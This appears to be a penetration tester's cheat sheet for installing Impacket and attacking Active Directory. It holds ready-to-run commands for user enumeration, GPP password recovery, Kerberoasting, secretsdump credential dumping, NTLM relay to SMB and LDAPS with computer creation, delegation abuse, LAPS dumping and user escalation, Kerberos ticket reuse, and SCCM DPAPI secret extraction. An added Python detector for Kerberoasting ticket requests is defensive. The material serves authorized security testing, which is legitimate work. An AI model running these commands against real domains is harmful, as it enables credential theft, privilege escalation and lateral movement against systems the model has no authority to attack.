These tool installs assume virtualenv is already present.
apt update
apt install python3-virtualenv
Note on virtualenv usage:
- these containers are used to allow conflicting dependency installs to live side by side harmoniously
- activate / deactivate dependency containers for proper usage
- prompt# source demo-env/bin/activate
- prompt(demo-env)# deactivate
- with screen/tmux, multiple dependency containers can be activated at the same time
Impacket
Overview: Swiss Army toolkit of Python classes for interacting with network and domain systems and services.
Tool available here
Possible Blurb: The tester next configured and launched a series of attacks against internal network and domain targets. The toolkit used to facilitate these attacks was Impacket. This collection of Python classes provides a framework for attacking various network protocols including HTTP, LDAP, and SMB.
Installation
cd /opt/
git clone https://github.com/fortra/impacket.git
cd impacket
virtualenv -p python3 imp-env
source imp-env/bin/activate
python3 -m pip install wheel
python3 -m pip install -r requirements.txt
python3 -m pip install .
deactivate
cd /opt/
Usage
so many usages.
Add a computer object.
Get a list of ADUsers?
python3 GetADUsers.py -all -ts 'domain.com'/'ella_mejia':'P@55w0rd' -dc-ip 192.168.2.4 |tee -a /opt/adusers.txt
GPP? Ya, you know me.
### Get-GPPPasswords!
Get-GPPPassword.py 'domain.com'/'ella_mejia':'P@55w0rd'@'192.168.2.4'
Crackable kerberos tickets via GetUserSPNs?
Possible Kerberoasting Blurb: The tester next performed the Kerberoast attack with the GetUserSPNs Python toolkit, again from the Impacket suite. Kerberoasting is an attack where the attacker requests Kerberos tickets, most frequently with downgraded ciphers (RC4), for all accounts with registered service principal names (SPNs). Because this activity is normal on most AD domains, this attack often goes undetected.
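The blurb above notes that Kerberoasting usually goes undetected. As an added example that is not part of the original page or of Impacket, the Python below shows the defender-side check: it scans Windows Security Event ID 4769 records (service ticket requests) for a single account pulling RC4 tickets (TicketEncryptionType 0x17) for several distinct user SPNs within a short window, which is the pattern a GetUserSPNs run leaves behind. The sample lines, account names and the key=value layout are constructed for this example; a real EVTX or SIEM export needs its own parser.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17          # TicketEncryptionType for RC4-HMAC (the "downgraded" cipher)
WINDOW = timedelta(minutes=5)
THRESHOLD = 3            # distinct service accounts per requester per window

# Constructed sample 4769 events in a simple key=value layout (not a real export).
SAMPLE_EVENTS = [
    "2024-05-01T09:00:01 EventID=4769 Account=ella_mejia ServiceName=svc_sql TicketEncryptionType=0x17",
    "2024-05-01T09:00:02 EventID=4769 Account=ella_mejia ServiceName=svc_http TicketEncryptionType=0x17",
    "2024-05-01T09:00:02 EventID=4769 Account=ella_mejia ServiceName=svc_backup TicketEncryptionType=0x17",
    "2024-05-01T09:00:03 EventID=4769 Account=ella_mejia ServiceName=WS01$ TicketEncryptionType=0x17",
    "2024-05-01T09:00:03 EventID=4769 Account=ella_mejia ServiceName=krbtgt TicketEncryptionType=0x17",
    "2024-05-01T09:01:00 EventID=4769 Account=bob ServiceName=svc_sql TicketEncryptionType=0x12",
    "2024-05-01T09:01:05 EventID=4769 Account=bob ServiceName=svc_http TicketEncryptionType=0x12",
    "2024-05-01T09:02:00 EventID=4768 Account=bob ServiceName=krbtgt TicketEncryptionType=0x12",
]

def parse_event(line):
    """Turn one sample line into a dict with a parsed timestamp and int fields."""
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = datetime.fromisoformat(ts)
    rec["EventID"] = int(rec["EventID"])
    rec["TicketEncryptionType"] = int(rec["TicketEncryptionType"], 16)
    return rec

def is_roastable_target(service):
    # Computer accounts (trailing $) and krbtgt are not what Kerberoasting goes after.
    return not service.endswith("$") and service.lower() != "krbtgt"

def find_kerberoast_candidates(lines, window=WINDOW, threshold=THRESHOLD):
    """Return {account: sorted services} for accounts that requested RC4 service
    tickets for at least `threshold` distinct user SPNs inside one `window`."""
    by_account = defaultdict(list)
    for rec in map(parse_event, lines):
        if (rec["EventID"] == 4769 and rec["TicketEncryptionType"] == RC4_HMAC
                and is_roastable_target(rec["ServiceName"])):
            by_account[rec["Account"]].append((rec["ts"], rec["ServiceName"]))
    hits = {}
    for account, reqs in by_account.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):      # slide the window over each start
            services = {s for t, s in reqs[i:] if t - start <= window}
            if len(services) >= threshold:
                hits[account] = sorted(services)
                break
    return hits
```

Bob's AES (0x12) requests and ella_mejia's computer/krbtgt tickets are ignored; only the burst of RC4 requests for three user SPNs is reported.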
GetUserSPNs.py 'domain.com'/'ella_mejia':'P@55w0rd' -dc-ip 192.168.2.4 -outputfile /opt/hashes/kerbs.txt
Secrets? Give us the secrets!
### ella is an admin of 192.168.2.5
python3 secretsdump.py 'domain.com'/'ella_mejia':'P@55w0rd'@192.168.2.5 |tee -a /opt/hashes/secrets-output.txt
ntlmrelayx: SMB
### smb relay first
### smb relay works only against smb targets
python3 ntlmrelayx.py -tf smbtargets.file -ts -of /opt/work/relays -l /opt/work/loot -smb2support |tee -a smb-relay.log
ntlmrelayx: LDAP
### ldap relay, you can't relay smb to ldap, you need wpad poisoning!
### responder -w to generate ldap-relayable credential material
### /opt/work/ directory must exist
### if ldap signing is in place, try just ldap://dc01 for a target
python3 ntlmrelayx.py -6 -t ldaps://dc01 -wh bhis-wpad --add-computer bhis-itops2 --delegate-access -ts -of /opt/work/relays --dump-laps -l /opt/work/loots --escalate-user popped.user | tee -a ldaps-relay.log
getTGT.py
For when password auth acts wonky or you just need a ticket.
python3 getTGT.py 'example.com'/'user':'Password'@DC-IP-Address
Then use export inline, H/T Brad…
### getTGT.py saves the ticket as user.ccache in the current directory; inline means the variable prefixes the command, no export
KRB5CCNAME=user.ccache python3 secretsdump.py 'example.com'/'user'@host-IP-Address -k -no-pass
…or export, then run command.
export KRB5CCNAME=user.ccache
python3 secretsdump.py 'example.com'/'user'@host-IP-Address -k -no-pass
SCCM Investigations per Gabriel
This impacket fork was designed to directly attack SCCM clients and recover credential materials where available. You need admin privs.
wget https://codeload.github.com/clavoillotte/impacket/zip/refs/heads/pr_SystemDPAPIdump
unzip pr_SystemDPAPIdump
cd impacket-pr_SystemDPAPIdump
virtualenv -p python3 dpapi-env
source dpapi-env/bin/activate
python3 -m pip install .
cd examples
SystemDPAPIdump.py
SystemDPAPIdump.py target.domain/adminuser@targetIP